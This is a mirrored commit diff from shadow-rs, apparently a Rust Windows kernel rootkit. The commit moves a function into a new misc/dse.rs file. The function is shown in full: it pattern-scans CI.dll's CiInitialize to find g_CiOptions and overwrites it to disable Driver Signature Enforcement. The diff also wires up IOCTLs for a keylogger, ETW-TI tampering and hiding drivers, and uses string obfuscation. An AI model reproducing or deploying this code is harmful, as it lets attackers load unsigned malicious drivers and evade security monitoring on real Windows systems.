aljaz/shadow-rs
1
1
Fork 0
mirror of https://github.com/joaoviictorti/shadow-rs.git synced 2026-01-08 10:04:22 +01:00
Code Issues Packages Projects Releases Wiki Activity

Moving DSE functionality to the misc module

Browse Source
This commit is contained in:
joaoviictorti
2024-09-17 10:59:15 -03:00
parent 91bcb3b8ff
commit 03db0a8f82
7 changed files with 79 additions and 38 deletions
Download Patch File Download Diff File Expand all files Collapse all files

11
driver/src/driver/ioctls.rs
View File

@@ -1,5 +1,14 @@
use {
crate::{driver::Driver, handle_driver, utils::ioctls::IoctlHandler}, alloc::boxed::Box, hashbrown::HashMap, shared::{ioctls::{IOCTL_ENUMERATE_DRIVER, IOCTL_HIDE_UNHIDE_DRIVER}, structs::{DriverInfo, TargetDriver}}, wdk_sys::{IO_STACK_LOCATION, IRP, STATUS_SUCCESS}
alloc::boxed::Box,
hashbrown::HashMap,
wdk_sys::{IO_STACK_LOCATION, IRP, STATUS_SUCCESS},
shared::{
ioctls::{IOCTL_ENUMERATE_DRIVER, IOCTL_HIDE_UNHIDE_DRIVER},
structs::{DriverInfo, TargetDriver}
},
crate::{
driver::Driver, handle_driver, utils::ioctls::IoctlHandler
},
};
pub fn get_driver_ioctls(ioctls: &mut HashMap<u32, IoctlHandler>) {

47
driver/src/driver/mod.rs
View File

@@ -1,11 +1,22 @@
use {
crate::utils::{address::{get_function_address, get_module_base_address}, patterns::scan_for_pattern, uni}, alloc::{boxed::Box, string::String, vec::Vec}, core::sync::atomic::{AtomicPtr, Ordering}, ntapi::ntldr::LDR_DATA_TABLE_ENTRY, obfstr::obfstr, shared::{
obfstr::obfstr,
spin::{lazy::Lazy, mutex::Mutex},
ntapi::ntldr::LDR_DATA_TABLE_ENTRY,
core::sync::atomic::{AtomicPtr, Ordering},
alloc::{boxed::Box, string::String, vec::Vec},
crate::utils::{
address::{get_function_address, get_module_base_address},
patterns::scan_for_pattern, uni
},
shared::{
structs::{
DriverInfo, HiddenDriverInfo, TargetDriver, DSE, LIST_ENTRY
},
vars::MAX_DRIVER
}, spin::{lazy::Lazy, mutex::Mutex}, wdk_sys::{
ntddk::MmGetSystemRoutineAddress, NTSTATUS, STATUS_INVALID_PARAMETER, STATUS_SUCCESS, STATUS_UNSUCCESSFUL
},
wdk_sys::{
ntddk::MmGetSystemRoutineAddress, NTSTATUS, STATUS_INVALID_PARAMETER,
STATUS_SUCCESS, STATUS_UNSUCCESSFUL
}
};
@@ -175,34 +186,4 @@ impl Driver {
Ok(())
}
/// Sets the DSE (Driver Signature Enforcement) status based on the information provided.
///
/// # Parameters
/// - `info_dse`: A pointer to the `DSE` structure containing information about the state of the DSE.
///
/// # Return
/// - `NTSTATUS`: A status code indicating success (`STATUS_SUCCESS`) or failure of the operation.
///
pub unsafe fn set_dse_state(info_dse: *mut DSE) -> Result<(), NTSTATUS> {
let module_address = get_module_base_address(obfstr!("CI.dll")).ok_or(STATUS_UNSUCCESSFUL)?;
let function_address = get_function_address(obfstr!("CiInitialize"), module_address).ok_or(STATUS_UNSUCCESSFUL)?;
// mov ecx,ebp
let instructions = [0x8B, 0xCD];
let c_ip_initialize = scan_for_pattern(function_address, &instructions, 3, 7, 0x89, i32::from_le_bytes).ok_or(STATUS_UNSUCCESSFUL)?;
// mov rbp,r9
let instructions = [0x49, 0x8b, 0xE9];
let g_ci_options = scan_for_pattern(c_ip_initialize as _, &instructions, 5, 9, 0x21, i32::from_le_bytes).ok_or(STATUS_UNSUCCESSFUL)?;
if (*info_dse).enable {
*(g_ci_options as *mut u64) = 0x0006_u64;
} else {
*(g_ci_options as *mut u64) = 0x000E_u64;
}
Ok(())
}
}

1
driver/src/lib.rs
View File

@@ -31,6 +31,7 @@ mod process;
mod thread;
mod module;
mod injection;
mod port;
mod utils;
/// The name of the device in the device namespace.

42
driver/src/misc/dse.rs Normal file
View File

@@ -0,0 +1,42 @@
use {
obfstr::obfstr,
shared::structs::DSE,
wdk_sys::{NTSTATUS, STATUS_UNSUCCESSFUL},
crate::utils::{
address::{get_function_address, get_module_base_address},
patterns::scan_for_pattern
},
};
pub struct Dse;
impl Dse {
/// Sets the DSE (Driver Signature Enforcement) status based on the information provided.
///
/// # Parameters
/// - `info_dse`: A pointer to the `DSE` structure containing information about the state of the DSE.
///
/// # Return
/// - `NTSTATUS`: A status code indicating success (`STATUS_SUCCESS`) or failure of the operation.
///
pub unsafe fn set_dse_state(info_dse: *mut DSE) -> Result<(), NTSTATUS> {
let module_address = get_module_base_address(obfstr!("CI.dll")).ok_or(STATUS_UNSUCCESSFUL)?;
let function_address = get_function_address(obfstr!("CiInitialize"), module_address).ok_or(STATUS_UNSUCCESSFUL)?;
// mov ecx,ebp
let instructions = [0x8B, 0xCD];
let c_ip_initialize = scan_for_pattern(function_address, &instructions, 3, 7, 0x89, i32::from_le_bytes).ok_or(STATUS_UNSUCCESSFUL)?;
// mov rbp,r9
let instructions = [0x49, 0x8b, 0xE9];
let g_ci_options = scan_for_pattern(c_ip_initialize as _, &instructions, 5, 9, 0x21, i32::from_le_bytes).ok_or(STATUS_UNSUCCESSFUL)?;
if (*info_dse).enable {
*(g_ci_options as *mut u64) = 0x0006_u64;
} else {
*(g_ci_options as *mut u64) = 0x000E_u64;
}
Ok(())
}
}

6
driver/src/misc/ioctls.rs
View File

@@ -1,11 +1,11 @@
use {
alloc::boxed::Box,
hashbrown::HashMap,
shared::structs::{Keylogger, DSE, ETWTI},
super::keylogger::set_keylogger_state,
shared::structs::{Keylogger, DSE, ETWTI},
wdk_sys::{IO_STACK_LOCATION, IRP, STATUS_SUCCESS},
shared::ioctls::{IOCTL_ENABLE_DSE, IOCTL_KEYLOGGER, IOCTL_ETWTI},
crate::{driver::Driver, handle_driver, misc::etwti::Etw, utils::ioctls::IoctlHandler},
crate::{handle_driver, misc::{etwti::Etw, dse::Dse}, utils::ioctls::IoctlHandler},
};
pub fn get_misc_ioctls(ioctls: &mut HashMap<u32, IoctlHandler>) {
@@ -13,7 +13,7 @@ pub fn get_misc_ioctls(ioctls: &mut HashMap<u32, IoctlHandler>) {
// Responsible for enabling/disabling DSE.
ioctls.insert(IOCTL_ENABLE_DSE, Box::new(|irp: *mut IRP, stack: *mut IO_STACK_LOCATION | {
log::info!("Received IOCTL_ENABLE_DSE");
let status = unsafe { handle_driver!(stack, Driver::set_dse_state, DSE) };
let status = unsafe { handle_driver!(stack, Dse::set_dse_state, DSE) };
unsafe { (*irp).IoStatus.Information = 0 };
match status {

3
driver/src/misc/mod.rs
View File

@@ -1,3 +1,4 @@
pub mod etwti;
pub mod keylogger;
pub mod ioctls;
pub mod ioctls;
pub mod dse;

7
driver/src/port/mod.rs Normal file
View File

@@ -0,0 +1,7 @@
pub struct Port;
impl Port {
}